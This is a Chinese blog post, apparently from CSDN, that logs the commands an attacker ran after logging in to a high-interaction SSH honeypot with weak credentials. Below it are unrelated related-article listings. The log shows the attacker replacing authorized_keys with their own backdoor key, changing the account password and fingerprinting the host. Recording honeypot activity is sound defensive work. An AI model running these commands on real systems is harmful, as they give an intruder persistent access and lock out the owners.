高交互ssh蜜罐被攻入后,攻击者用到的命令及木马

最新推荐文章于 2024-10-03 08:44:33 发布
最新推荐文章于 2024-10-03 08:44:33 发布
阅读量188 收藏
点赞数 3
分类专栏: 网络安全 网络安全工具 文章标签: 网络安全 ssh 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65279640/article/details/141712566
版权

攻击者所用命令

New connection: 49.235.239.235:56368 (10.0.4.12:22) [session: dd66adb8ca7e]
Remote SSH version: SSH-2.0-libssh_0.9.6
login attempt [test/test11] succeeded
cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cat /proc/cpuinfo | grep name | wc -l
echo -e "test11\n7ALXlVrcLLTq\n7ALXlVrcLLTq"|passwd|bash
Enter new UNIX password: 
echo "test11\n7ALXlVrcLLTq\n7ALXlVrcLLTq\n"|passwd
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls
crontab -l
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
top
uname
uname -a
whoami
lscpu | grep Model
df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
Connection lost after 16 seconds

所用木马程序样本报告

masa010
关注
专栏目录
Go-SSHHiPotGo语言实现的一个交互SSH蜜罐项目
08-14
SSHHiPot是一个基于Go语言开发的交互SSH蜜罐项目,它的主要目的是为了网络安全研究,帮助监测和收集潜在的SSH攻击。蜜罐技术是网络安全防御的一种策略,它模拟真实系统来吸引并捕获攻击者,从而获取攻击者的行动...
网络安全领域之-蜜罐技术
柳岸花又明的博客
11-15 2232
其次是交互蜜罐交互蜜罐是相对于低交互蜜罐而言的,是在开放相关端口的基础之上增加了一些仿真的服务或者应用在里面,达到一个更好迷惑攻击者视线的一个效果,一般此类蜜罐,像web类蜜罐会在护网或者重保期间通过防火墙,或者路由器映射在用户互联网出口处,“故意”让攻击者去攻击“蜜罐”这样的话,蜜罐就可以在攻击者打到真实业务之前就锁定攻击者的ip,以至提前做出相关的策略、响应。所以说,蜜罐的部署方式基本是依照与该厂商蜜罐的特性而言的,蜜罐的部署需要考虑多个因素,如蜜罐的类型、部署位置、操作系统、应用程序等。
交互数据库蜜罐的设计与实现.docx
06-06
相较于低交互蜜罐交互蜜罐能够提供更加真实的服务环境,允许攻击者与之进行更深层次的交互。这意味着它可以更好地模拟真实世界的场景,从而更准确地捕获攻击者的意图和技术手段。然而,这也意味着交互蜜罐的...
构建交互蜜罐监控系统
09-06
交互蜜罐相比于低交互型,具有更的欺骗性,因为它运行的是真实操作系统,包含所有可能的漏洞,允许攻击者深入探索和交互,从而获取更丰富的威胁情报,但也因此增加了被攻击者识破的风险。 Sysdig 和 Falco 是...
网络游戏-基于交互蜜罐网络安全系统及实现方法.zip
09-19
《网络游戏-基于交互蜜罐网络安全系统及实现方法》 在当今的互联网环境中,网络游戏已经成为用户娱乐的重要组成部分,但同时也面临着各种网络安全威胁。交互蜜罐技术是一种有效的网络安全防御手段,它通过...
伪装交互蜜罐技术的研究与实现
06-14
综上所述,伪装交互蜜罐系统通过采用多层次的架构设计和技术手段,能够在很大程度上提蜜罐的伪装度和交互性,有效地吸引和迷惑攻击者,为网络安全研究人员提供了更为强大的工具。此外,这种系统还可以根据不同...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8486
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Django Nginx+uwsgi 安装配置
lly202406的博客
10-02 469
本文将详细介绍如何在Linux环境下安装和配置Django应用程序,使用Nginx作为Web服务器和uwsgi作为应用程序服务器。
使用 Docker 构建 LLaMA-Factory 环境
GDHBFTGGG的博客
10-01 1088
使用 Docker 构建 LLaMA-Factory 环境可以简化依赖安装和环境配置。
(笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 437
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
MySQL - 运维
ltt159264的博客
09-29 311
记录了所有的增删改查语句以及DDL语句
运维自动化shell脚本总结
最新发布
大黄鸭在发光的专栏
10-03 366
Shell脚本是一系列命令的集合,通常用于自动化执行任务。
IT基础监控范围和对象
MXsoft618的博客
09-29 583
综上所述,监控易的监控范围非常广泛,几乎涵盖了所有主流的IT基础设施以及相关的设备和系统。通过全面、实时、准确的监控功能,监控易为运维团队提供了强大的支持,帮助他们及时发现并解决潜在的问题,确保业务系统的稳定运行和运维。除了上述监控范围外,监控易还支持其他扩展监控功能,如被动式设备监控、自定义脚本监控、级监测点监控等。监控易作为一款由美信时代独立自主研发的分布式一体化集中监控平台,其监控范围极为广泛,几乎涵盖了所有主流的IT基础设施以及相关的设备和系统。
【大数据】大数据运维方案浅析总结
wnm23的专栏
09-27 983
流行的大数据运维管理,包括Cloudera的CDH和CDP、Hortonworks的HDP、Apache的Ambari、国产开源平台Datasophon,以及自动化运维工具Ansible和SaltStack。
Linux编译部署PHP环境
ddf128的博客
09-30 1491
"LMNP"环境通常是指在Linux系统中,使用Nginx作为Web服务器,MySQL作为数据库服务器,以及PHP作为服务器端脚本语言的服务器架构。Linux是一个自由和开源的操作系统,用作网络服务器的基础。Nginx是一个性能的HTTP和反向代理服务器,以其稳定性、丰富的功能和低资源消耗而闻名。Nginx非常适合处理并发连接,因此常被用作Web服务器和负载均衡器。MySQL是一个流行的关系型数据库管理系统,用于存储和管理网站数据。PHP 是一种服务器端的脚本语言,用于创建动态网页。
深入探讨 Docker:远程登录与镜像管理
IT小辉同学
09-29 834
走一路,寻索一路。每有胡杨树,我必仔细浏览,驻足长久,如急于兑现一个久远的梦。而更多平常的日子如同荒原本身一样朴实无华,如同岁月一样不露形色,只守着一份心的宁静与知足。——《胡杨祭》
周末总结(2024/09/29)
weixin_44125071的博客
09-29 412
日常工作生活总结
windows下安装nginx和基本配置
weixin_48018877的博客
10-01 504
Nginx 的配置文件位于安装目录下的 conf 文件夹内,文件名为 nginx.conf。此时,Nginx 已经开始运行,可以通过访问 http://localhost 来确认 Nginx 是否启动成功。这里配置了Nginx监听80端口,并设置了网站的根目录为 html 文件夹,以及默认的首页文件名。安装 Nginx 实际上是解压下载的文件。可以选择一个适合的位置来存放 Nginx 的文件夹。并选择适合 Windows 的版本。从 Nginx 官方网站下载 Windows 版本的 Nginx。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值